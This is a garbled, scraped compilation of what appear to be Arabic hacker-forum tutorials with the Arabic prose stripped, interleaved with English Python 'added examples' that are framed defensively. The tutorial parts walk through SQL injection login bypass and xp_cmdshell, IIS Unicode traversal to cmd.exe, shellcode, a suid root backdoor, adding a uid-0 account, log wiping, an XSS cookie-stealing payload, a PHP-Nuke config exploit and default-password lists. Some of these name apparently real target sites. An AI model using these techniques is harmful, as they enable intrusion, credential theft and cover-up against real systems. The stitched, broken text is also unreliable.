http://www.pc-worlds.net/lunexx.html
.
:Browser
URL
ftp:// http:// FTP
.
:SLIP/PPP
.Client Programs
Windows .Ws_ftp
:Ws_ftp LE 5.06
Session
Profile Profile Name
My Home Page In Tripod Host Name
ftp.tripod.com Host Type Auto Detect
User ID
... .
.
:Telnet
Telnet
. .
Windows
"" .
" "FTP
> <
>< hacker dz :
FTP
21
FTP
Superscanne
Start
Run
ftp n
<FTP
Open
Enter
<FTP
To
To
Connected to www.assassin.com.
220 websrv1 Microsoft FTP Service (Version 4.0).
ftp> quote user ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Anonymous user logged in.
20
pwd
cd
cd black
ls
get
get black.exe
put
put black.exe
close
Codes:
Code  Signification
110   Restart marker reply.
120   Service ready in nnn minutes (nnn is a time).
125   Data connection already open; transfer starting.
150   File status okay; about to open data connection.
200   Command okay.
202   Command not implemented, superfluous at this site.
211   System status, or system help reply.
212   Directory status.
213   File status.
214   Help message.
215   NAME system type.
220   Service ready for new user.
221   Service closing control connection.
225   Data connection open; no transfer in progress.
226   Closing data connection.
227   Entering passive mode (h1,h2,h3,h4,p1,p2).
230   User logged in, proceed.
250   Requested file action okay, completed.
257   "PATHNAME" created.
331   User name okay, need password.
332   Need account for login.
350   Requested file action pending further information.
421   Service not available, closing control connection.
425   Can't open data connection.
426   Connection closed; transfer aborted.
450   Requested file action not taken (file already in use by something else).
451   Requested action aborted: local error in processing.
452   Requested action not taken (not enough memory to execute the action).
500   Syntax error, command unrecognized.
501   Syntax error in parameters or arguments.
502   Command not implemented.
503   Bad sequence of commands.
504   Command not implemented for that parameter.
530   Not logged in.
532   Need account for storing files.
550   Requested action not taken (file not found, no access possible, ...).
551   Requested action aborted: page type unknown.
552   Requested file action aborted.
553   Requested action not taken (file name not allowed).
> <
>< linuxray :
: ) ( SQL
ASP
SQL ASP SQL
SQL
1433
SQL
SQL .
: SQL
PHP ASP
_LinuxRay
- - -
. Administrator
...
: SQL
User Name Passwd
:
User name and Passwd ASP
* sql.
htr.+
:
http://target/page.asp+.htr
: target
: Page asp
: htr.+
....
View Source ASP
:
<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
----------------------------------------------------------------
user name: _LinuxRay
password: 6666666
-----------------------------------------------------------------
ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.
.
ASP
database.inc
<!--#include file="database.inc"-->
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
New
(Project (Exiting Data
.
Create
Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
>< hish_hish :
(:
,
PHP ASP
.
SQL Server , MySQL,Oracle
SQL
(: ((((:
SQL
SQL
SQL injection
/http://www.stc.com.sa
http://www.stc.com.sa/arabic/scripts/ar_frame.asp?pagenum=25
!!!!
SQL injection
' :
' :
:
SQL
inject SQL Query
.
SQL injection
:code
admin :
t0ps3cr3t :
SQL :
:code
User admin
t0ps3cr3t
TRUE .
FALSE
: . SQL
> <field from web form
' SQL
:
:code
!!
blah' OR '1'='1 :
.
SQL
:code
SELECT * from Users
WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'
''blah' OR '1'='1
OR
''blah
TRUE
''1'='1
1 1 !!!!
TRUE OR TRUE
TRUE
: TRUE TRUE
TRUE TRUE SQL injection
Users
.....
SQL WHERE
(two dashes) -- ,
blah' OR '1'='1'--  :
) --
SQL
having clause
' having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
username
password ,username,id,userid,email
first_name,
userid
:
cs_isp_user
passwd
blah' group by (passwd)--  :
:
:
UserID userid
MS SQL Server (:
UserID passwd
(:
blah'; INSERT INTO cs_isp_user(UserID,passwd) VALUES('M_3','hi')--  :
M_3 hi
) ( inject
id ) (
user
id
username ) ( admin1
passwd
union )
(
blah' union SELECT username FROM user :
:
id
blah' union SELECT username,username FROM user
blah' union SELECT username,username,username,username,username FROM user
:
( :
)SQL
(int )( Lame_Admin
Lame_Admin ,
(: microsoft ( :
blah' union SELECT passwd,passwd,passwd,passwd,passwd FROM user
:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'stupid' to a column of data type int.
/admin/admin.asp, line 13
Stored Procedure
Built-in
Stored Procedure SQL Server sa
SQL Server
SQL Server
Stored Procedure 100
+------------------------------------------------------------------------------+
| xp_cmdshell        | run an operating-system command                        |
| xp_regread         | read a registry value                                  |
| xp_regdeletekey    | delete a registry key                                  |
| xp_regdeletevalue  | delete a registry value                                |
| xp_regwrite        | write a registry value                                 |
| xp_servicecontrol  | start/stop a Windows service                           |
+------------------------------------------------------------------------------+
Procedure
'; exec master..xp_cmdshell 'dir'--
xp_cmdshell
'; exec master..xp_regwrite 'REGISTRY KEY', VALUE--
asp
asp
CREATE TABLE M_3 (source varchar(8000))
M_3 is a table with a single varchar(8000) column.
bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp'
union .
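The login query discussed above, rebuilt against an in-memory SQLite table so the injections can be run offline. This is an added example, not code from the original page: login_vulnerable() builds the SQL by string concatenation as the ASP page does, login_safe() binds parameters, and the lookup pair shows the UNION leak. The Users table, its two columns and the admin/t0ps3cr3t row follow the page; the rest of the schema and the comment payload are constructed.

```python
# Added example (not from the original page): the page's login query against
# SQLite, vulnerable and parameterised side by side. Table/column names and
# the admin/t0ps3cr3t row follow the page; the schema is constructed.
import sqlite3
from typing import List

PAYLOAD_TAUTOLOGY = "blah' OR '1'='1"      # used in both fields, as on the page
PAYLOAD_COMMENT = "admin'--"               # username only: -- drops the password check
PAYLOAD_UNION = "blah' UNION SELECT Password FROM Users--"


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (User_Name TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('admin', 't0ps3cr3t')")
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    # Attacker-controlled strings are pasted straight into the SQL text,
    # so quotes, OR and -- become part of the query.
    query = ("SELECT * FROM Users WHERE User_Name='%s' AND Password='%s'"
             % (user, pwd))
    return db.execute(query).fetchone() is not None


def login_safe(db: sqlite3.Connection, user: str, pwd: str) -> bool:
    # Placeholders: the driver sends the values separately; quotes stay data.
    query = "SELECT * FROM Users WHERE User_Name=? AND Password=?"
    return db.execute(query, (user, pwd)).fetchone() is not None


def lookup_vulnerable(db: sqlite3.Connection, name: str) -> List[str]:
    # A one-column search: a UNION with one column leaks whatever it selects.
    rows = db.execute(
        "SELECT User_Name FROM Users WHERE User_Name='%s'" % name).fetchall()
    return [r[0] for r in rows]


def lookup_safe(db: sqlite3.Connection, name: str) -> List[str]:
    rows = db.execute("SELECT User_Name FROM Users WHERE User_Name=?",
                      (name,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print("tautology:", login_vulnerable(db, PAYLOAD_TAUTOLOGY, PAYLOAD_TAUTOLOGY),
          login_safe(db, PAYLOAD_TAUTOLOGY, PAYLOAD_TAUTOLOGY))
    print("comment  :", login_vulnerable(db, PAYLOAD_COMMENT, "wrong"),
          login_safe(db, PAYLOAD_COMMENT, "wrong"))
    print("union    :", lookup_vulnerable(db, PAYLOAD_UNION),
          lookup_safe(db, PAYLOAD_UNION))
```

With the tautology the WHERE clause becomes `... OR '1'='1'`, which is true for every row; with `admin'--` everything after the username, including the password test, is a comment; with the UNION the password column is returned where a username was expected. The parameterised versions return False or an empty list for all three, because the driver never lets the input change the query's structure.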
" "
> <
>< CONIK :
-:
-:1
-:
user administrator
) (
-:2
-: %99 C
.
shell
PHP Shell PHP .
Kernel 2.2.x
) C (
perl
linux Redhat 7.3
-:3
-:
$ ./file.pl
Access Denied
$ chmod +x Conik.pl
$ ./Conik.pl
-:4 C
gcc -o Conik Conik.c
gcc -o Conik conik.c
./Conik
$ gcc -o sendmail sendmail.c
$ ./sendmail
Usage : sendmail <host> <OS> <user> <password>
$ ./sendmail smtp.israel.com RedHat-7.3 anonymous anonymous
connecting to host...
connected...
id
uid=0(root) gid=0(root)
Sendemail
Root Exan nofer
XXX. SENDMAIL
(-:
-:5
-:
-:6 Conik C Perl
PHP - CGI - UNICODE - VB - etc
-:7 UNICODE
-: UNICODE IIS Microsoft
-: UONICODE
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
UONICODE
CGI
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/info2www
/cgi-bin/environ.cgi
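The decoding that made the IIS requests above work, turned into a detector; this is an added example and not code from the original page. IIS checked the request path before it had fully canonicalised it: `%255c` was decoded a second time after the check, and the overlong UTF-8 forms `%c0%af` and `%c1%9c` were accepted as `/` and `\`. A detector therefore has to decode as many times as the server did, fold the overlong forms, unify the separators, and only then count how far the `..` segments climb. The request samples are the page's; the decoding rounds, the overlong table and the depth rule are assumptions of this example.

```python
# Added example (not from the original page): detect the Unicode/double-decode
# traversal requests listed above by decoding the path the way IIS 4/5 did
# and then checking whether '..' ever climbs above the virtual root.
from typing import List
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of '/' and '\' that old IIS accepted (assumed table).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\",
            b"\xc0\x2f": b"/", b"\xc1\x1c": b"\\"}


def decode_like_iis(raw_path: str, rounds: int = 2) -> str:
    """URL-decode `rounds` times, fold overlong sequences, unify separators."""
    data = raw_path.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(rounds):              # %255c -> %5c -> backslash
        data = unquote_to_bytes(data)
    for bad, good in OVERLONG.items():   # %c0%af -> '/'
        data = data.replace(bad, good)
    return data.decode("latin-1").replace("\\", "/")


def escapes_webroot(path: str) -> bool:
    """True if the '..' segments ever climb above the virtual root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def is_traversal_request(raw_path: str) -> bool:
    return escapes_webroot(decode_like_iis(raw_path))


SAMPLES: List[str] = [   # first three are from the page, the last is benign
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
    "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/_vti_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\\",
    "/scripts/index.asp",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(is_traversal_request(s), decode_like_iis(s))
```

A single decode, which is what a naive filter does, leaves `%5c` in place and sees no traversal at all; that gap is exactly what the `%255c` variants exploited.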
" "
> <
><Black_sNiper :
...
..
.:
who
rwho
finger
.:
username : Black
password : Black2
test demo
.:
/etc/passwd
/etc/group
/etc/hosts
/usr/adm/sulog
/usr/adm/loginlog
/usr/adm/errlog
/usr/adm/culog
/usr/mail
/usr/lib/cron/crontabs
/etc/shadow
.: bin
)( )( !!
.:
$ ed passwd
exec login !!
!!
.:
)( ..
.:
$ pwd
.:
$ /usr/admin
..
.. :
$ /usr/Black
!!
.:
$ ls /usr/Black
.:
mail
pers
games
bin
.profile
.:
$ cd
$ ls -a
:
:
.profile
$
.:
$ cat letter
letter
.:
$ passwd
!! ..
.:
$ grep phone Black
.:
$ cp letter letters
.:
$ write
.:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31
.. .:
$ cat /etc/passwd
root:F943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
.:
Black:chips11,43:34:3:Mr doooom:/usr/Black:
..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
bluebox::70:
!!
..
"
"
><
> : <
UNix Usage IN HackinG
.. up to date
(:
: pc , servers , supercomputers
BOX
..
... root , superuser
....
:
.. .. windows
..
.. ...
:
-1 ... nt .
9x
.. ..
..
-2 .. ..
...
.. :
-1 ). (
-2 open source
.. (:
BSD ..
...
..
.. ) SuSe
(
MDK
..
9 ) 7.2 (
.. .. ... .. .. ..
.. ... .. ..
.. ... .. (:
..
.. ... .. ..
..
.. ..
.. ..
internal .. winmodems
.. windows ..
(:
.. external real or true modems
... acorp , u.s. robotics
serial USB
...
.. isp (:
..
:
-1 ..
isp ...
-2 ...
-3 ... .. ..
(:
=====< ... ..
======< ======< ...
.. .
:
.. ..
-4 gov .mil. edu.
.
-5 .. .
REdirecting
: TCP ..
TCP\IP
....
... =D
..
.. ) (
<< service..
service daemon or server
.. ..
=D
..
daemon     service   port
FTPd       FTP       21
telnetd    Telnet    23
sendmail   SMTP      25  (yes!)
apache     HTTP      80
qpop       POP3      110
The trailing d in ftpd, telnetd etc. stands for daemon.
: www.host.net
TCP 80
GET /index.html HTTP/1.1 ..
index.html
daemons ...
=<
daemons
... ..
... port scaners
..
... nmap fyodor
!!.. ..
=>
http://members.lycos.co.uk/linuxdude/e3sar/
.. nmap rpm
:
bash-2.03$ rpm -i nmap-2.53-1.i386.rpm
.. target.edu
..
:
bash-2.03$ nmap -sS target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
110/tcp    open        pop3

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
nmap !!
daemons target.edu
..
.. .. .. ..
.. ... TCP :
bash-2.03$ telnet target.edu 21
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu FTP server (SunOS 5.6) ready.
quit
221 Goodbye.
Connection closed by foreign host.
(:
SunOS 5.6 -1
sunOS standard -2
:
bash-2.03$ telnet target.edu 25
Trying xx.xx.xx.xx...
Connected to target.edu.
Escape character is '^]'.
220 target.edu ESMTP Sendmail 8.11.0/8.9.3; Sun, 24 Sep 2000 09:18:14 -0400 (EDT)
quit
221 2.0.0 target.edu closing connection
Connection closed by foreign host.
sendmail smtp
8.11.0/8.9.3
..
.. daemon
:
nmap
bash-2.03$ nmap -sS -O target.edu

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on target.edu (xx.xx.xx.xx):
(The 1518 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
23/tcp     open        telnet
25/tcp     open        smtp
80/tcp     open        http
110/tcp    open        pop3

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=937544 (Good luck!)
Remote operating system guess: Linux 2.1.122 - 2.2.14

Nmap run completed -- 1 IP address (1 host up) scanned in 34 seconds
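The banner grabbing shown above (telnet to 21 and 25, read the greeting) as a small parser, added here as an example and not code from the original page. It pulls host, software, version and any OS name out of the 220 greeting and compares that with the nmap OS guess: when the FTP banner says SunOS and the TCP/IP fingerprint says Linux, as in the session above, one of them is wrong, and the banner is the easier of the two to fake. The banner strings are the page's; the regular expressions and the verdict rule are mine.

```python
# Added example (not from the original page): parse the 220 greetings from the
# session above and cross-check the OS they claim against nmap's guess.
import re
from typing import Dict, Optional

FTP_BANNER = "220 target.edu FTP server (SunOS 5.6) ready."
SMTP_BANNER = ("220 target.edu ESMTP Sendmail 8.11.0/8.9.3; "
               "Sun, 24 Sep 2000 09:18:14 -0400 (EDT)")
NMAP_OS_GUESS = "Linux 2.1.122 - 2.2.14"

FTP_RE = re.compile(r"^220[ -](?P<host>\S+) FTP server \((?P<software>[^)]*)\)")
SMTP_RE = re.compile(r"^220[ -](?P<host>\S+) E?SMTP (?P<software>\S+) (?P<version>[\w./-]+)")
OS_NAMES = ("SunOS", "Solaris", "Linux", "FreeBSD", "OpenBSD", "NetBSD",
            "IRIX", "AIX", "HP-UX", "Windows")


def parse_banner(line: str) -> Dict[str, Optional[str]]:
    """Pull host, software, version and any OS name out of a 220 greeting."""
    info: Dict[str, Optional[str]] = dict.fromkeys(
        ("service", "host", "software", "version", "os"))
    m = FTP_RE.match(line)
    if m:
        info.update(service="ftp", host=m.group("host"),
                    software=m.group("software"))
    else:
        m = SMTP_RE.match(line)
        if m:
            info.update(service="smtp", host=m.group("host"),
                        software=m.group("software"), version=m.group("version"))
    if info["version"] is None:
        vm = re.search(r"\d+(?:\.\d+)+", line[4:])   # first dotted number after the code
        info["version"] = vm.group(0) if vm else None
    lowered = line.lower()
    info["os"] = next((n for n in OS_NAMES if n.lower() in lowered), None)
    return info


def banner_agrees_with_nmap(banner_os: Optional[str], nmap_guess: str) -> Optional[bool]:
    """None when the banner names no OS; otherwise whether nmap's guess contains it."""
    if banner_os is None:
        return None
    return banner_os.lower() in nmap_guess.lower()


if __name__ == "__main__":
    for banner in (FTP_BANNER, SMTP_BANNER):
        info = parse_banner(banner)
        print(info, "agrees with nmap:", banner_agrees_with_nmap(info["os"], NMAP_OS_GUESS))
```

The SMTP banner still yields the exploitable fact, sendmail 8.11.0/8.9.3, even though it names no operating system; the FTP banner's SunOS claim is the one to distrust once nmap's fingerprint disagrees with it.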
|:
!!!!!!
!!!!!! sunOS =@
..
..
...
Ss- =D
:
bash-2.03$ man nmap
..
) (
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com.
220 shell.com FTP server (SunOS 5.6) ready.
Name: luser
331 Password required for luser.
Password:
230 User luser logged in.
ftp> put program.c
200 PORT command successful.
150 ASCII data connection for program.c (204.42.253.18,57982).
226 Transfer complete.
ftp> quit
221 Goodbye.
ftp
.
sh-2.03$ vi exploit.c
c.
.
sh-2.03$ gcc program.c -o program
sh-2.03$ ./program
: ..
. usage
-: .
..
http://www.linux.com.cn/hack.co.za
..
..
.. TARGET.EDU
sendmail 8.11.0
..
:
http://www.pharaonics.net/less/NEtworks/124.htm
. .. )
(
.. ....
..
..
www.securityfocus.com :
www.insecure.org/sploits.html
..
..
... ) (
shell code
..
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
.. bin/sh/
..
.
...
..
..
bash-2.03$ telnet myshellaccount 23
Trying xx.xx.xx.xx...
Connected to yourshellaccount.
Escape character is '^]'.
Welcome to yourshellaccount
login: malicioususer
Password: (it doesn't display)
.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul ..
..
..
sh-2.03$ exit
80 = D :
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(
.. suid sushi
sash A
stand-alone shell
...
suid bin/sh/ sushi
-2
etc/passwd/
-: vi
sh-2.03$ vi /etc/passwd
vi
luser:passwd:uid:gid:startdir:shell
uid & gid =0
:
dood::0:0:dood:/:/bin/sh
sh-2.03$ su dood
sh-2.03$ whoami
dood
tty1
root
zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:
..
.
" "
> <
> : <
...
FreeServers.com
:
Caller ID
...
notepade
Hakkerz.home.ml.org
html
@Blahblahblah
header
IP Whois
finger
@Finger
scan ports IP
Linux /Unix systems
Exploit Generator
linux 21
FTP 23 TelNet
Telnet Anonymous
hakkerz.home.ml.org telnet 23
www telnet.Victim.com
telnet www
whois
21 ftp
SYST 80 http
Whats
?Running
Login: root$
Password: root$
linux
telnet
ACCOUNT: PASSWORD
)login) root: (password) root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
whois unix
passwd
ftp
internet explorer
IP jammer .hakkerz.home.ml.org
PHP Shell
**-----------------------------------------------
:
**-----------------------------------------------
ls -a :
**-----------------------------------------------
cat -e : cat
**-----------------------------------------------
rm -f :
**-----------------------------------------------
rm -d :
**-----------------------------------------------
cp -i :
**-----------------------------------------------
mv :
**-----------------------------------------------
:
help--
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
-1
-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!
-1
: hacked.txt
**-----------------------------------------------
-2
**-----------------------------------------------
-3 .
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2
.
**-----------------------------------------------
-1 My SQL config.php
PHP Shell
cat config.php
**-----------------------------------------------
-2 htpasswed.
htaccess.
/home/site/.htpasswds/forum/admin/passwd :
cat /home/site/.htpasswds/forum/admin/passwd :
DES
user:nymw4oS3oerdY
**-----------------------------------------------
-3 : service.pwd
DES
:
_vti_pvt
cat /home/site/www/_vti_pvt/service.pwd :
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :
phpMyAdmin
config.php
!!
:
/home/site/public_html
/home/site/www
**-----------------------------------
-3
.
)(
)(
:
TCP sequencability
.
" "
> <
><network access :
) (
%50 %50
aswind.COM
ip
INTERNIC.NET
INTERNIC.NET
:
NSLOOKUP
SET TYPE = ALL
aswind.COM
:
Domain Name: ASWIND.COM
C 200.200.200.0 LMHOSTS
NetBios N2 = 200.200.200.2 Net view
net view \\servername (N1 .. N254)
1 254
\
Administrator
Windwos
username and password net user
Messenger Service
NetBios
IP 200.200.200.200 nbtstat -a 200.200.200.200
MSBROWSER )
(
John IP 200.200.200.50
Nbtstat -a 200.200.200.50 john
johnPC
) ( Administrator
Messenger Service )
(
MSBROWSER nbtstat -a
nt senstiver )
(.
l0pthcrack .
... ..
===========================================================
=====================================
:
...
.
:
Hello FOLKS board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
malicious code
...
HTML
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">');</script>
<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>
comment.cgi
mycomment
.
BADFILE
cross-site scripting " "
CSS
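The two message-board payloads above, pasted into a page by naive string concatenation and then rendered again with HTML escaping; an added example, not code from the original page. A comment is data inside an element, so the characters < > & " ' are encoded before the text goes into the page. The URL-borne variant (comment.cgi?mycomment=<SCRIPT>...) reaches the same render function after the CGI decodes the query string, so the same escaping covers it. The template and the comment_from_url helper are assumptions of this example.

```python
# Added example (not from the original page): reflect the page's XSS payloads
# into a post template with and without escaping. The template and the
# comment.cgi query handling are constructed for the example.
import html
from urllib.parse import parse_qs, urlsplit

PAYLOAD_SCRIPT = "Hello FOLKS board. <SCRIPT>malicious code</SCRIPT> end"
PAYLOAD_COOKIE = ("<script>document.write('<img src=\"http://my_ip_address/'"
                  "+document.cookie+'\">');</script>")
LINK = "http://example.com/comment.cgi?mycomment=<SCRIPT>malicious code</SCRIPT>"

TEMPLATE_HEAD = '<div class="post">'
TEMPLATE_TAIL = "</div>"


def render_vulnerable(comment: str) -> str:
    # The board just concatenates: whatever the user typed becomes markup.
    return TEMPLATE_HEAD + comment + TEMPLATE_TAIL


def render_safe(comment: str) -> str:
    # Element content: encode < > & and the quote characters.
    return TEMPLATE_HEAD + html.escape(comment, quote=True) + TEMPLATE_TAIL


def comment_from_url(url: str) -> str:
    """What comment.cgi sees in mycomment after decoding the query string."""
    return parse_qs(urlsplit(url).query).get("mycomment", [""])[0]


def body_has_tags(page: str) -> bool:
    """True if any raw tag survived inside the post body."""
    body = page[len(TEMPLATE_HEAD):-len(TEMPLATE_TAIL)]
    return "<" in body or ">" in body


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_COOKIE, comment_from_url(LINK)):
        print("vulnerable:", body_has_tags(render_vulnerable(payload)),
              "| safe:", body_has_tags(render_safe(payload)))
        print(render_safe(payload))
```

Escaping is context-specific: the same text placed inside an attribute value or a URL needs attribute or URL encoding in addition to this, which is why the cookie-stealing payload targets exactly the places where a board forgets one of those contexts.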
=========================================================
:
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
" "
> <
> :<
, ...
, - - - - ......
........... :
.
.
.
.
.
.
.
.
.
.
.
.
.
:
==================================================
=
--><h3>put your text here<xmp><plaintext
==================================================
:
=====
!
" "
> <
><Dr^FunnY :
... html
..... ...
" "
" ... "HTML ...
(: .
.
" "
> <
= Exploit =
:
..
:
-1
super scan
.
-2
.
www.netcraft.net
!.!!.. ...
-3
-4
/....../www.thesite.com
:
*pl.
Active Perl
* c.
*sh.
www.securiteam.com
www.securityfocus.com
www.ukrt.f2s.com
www.ussrback.com
www.packetstorm.securify.com
www.secureroot.com
www.rootshell.com
.
.
.. shadowed
.encryption
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp
...
x ..
:
root:x:0:1:Super-User:/:/sbin/sh
root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
= root
= x
shadowed
shadow file
= token
OS        shadow file                          token
Linux     /etc/shadow                          *
SunOS     /etc/shadow                          *
FreeBSD   /etc/master.passwd or /etc/shadow    *
IRIX      /etc/shadow                          x
AIX       /etc/security/passwd                 !
ConvexOS  /etc/shadow or /etc/shadpw           *
root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
EpGw4GekZ1B9U
John the ripper
.
x
:
john passwd
passwd
:
John the Ripper Version 1.3 Copyright (c) 1996,97 by Sola
Loaded 1 password
***** v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: ***** DONE
john.pot
.
" "
> <
>< icer :
:
1
2 ) (
3 ...
4 ...
1
.. ..
..
threads
cgi scaners
..
2
) ( shadow ..
...
url .. ..
url rootshell.com
%99 ..
.......
3 :
..
.. commands ..
, http BOF
..
..
....
config.inc
... ..
4 :
:
www.insecure.org / securityfocus.com / packetstorm.securify.com
www.rootshell.com (:
" "
><
><oOoDa BE$T :
:
txt. :
..
,.. ..
c. :
.. ..
)_ (compile )(_
... .. Linux
.. Shell Account
:
----> gcc filename.c
:
---> this produces a.out ..
..
:
./a.out xxx.xxx.xxx.xxx
:
.pl :
.. Linux Shell Account
exploit :
perl filename.pl xxx.xxx.xxx.xxx
or: ./filename.pl xxx.xxx.xxx.xxx
" "
> <
><DeadLine :
:
:
Microsoft-IIS/5.0 on Windows 2000
98
98 :
Web Folders :
:
:
My Computer
My Computer
Web Folders
:
Add Web Folder
: Add Web Folder
Type the location to add
:
http://hostname.com/
hostname
:
mail.talcar.co.il
daihatsu-israel.co.il
daewoo-israel.co.il
:
http://192.117.143.121/
Next :
finish :
Web Folder :
:
http://www.israwine.co.il/ 212.199.43.84
:
.
" "
<>
>Arab VireruZ :>
:
twlc: here your 0day from LucisFero and supergate
Posted on Monday, September 24 @ 14:25:58 CDT
topic: advisories
twlc security divison
24/09/2001
.Php nuke BUGGED
:Found by
LucisFero and supergate
twlc/.
Summary
This time the bug is really dangerous... it allows you to 'cp' any file on the box... or even upload files.
Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is bugged)
Explanation
?Do you need sql password
http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
http://www.server.net/admin.php?upload=1&file=config.php&file_name=ultramode.txt&wdir=/&userfile=config.php&userfile_name=ultramode.txt
=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-
==-=-=-=-=-=-=-=-=-=-
:
= config.php ultramode.txt
(-:
http://server.com/ultramode.txt
=-
-1 server.com
-2 http://server.com/nuke :
-3 5.2 .
<angels-bytes
))*/ angels-bytes.com ((
*/
*/ */
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
include#
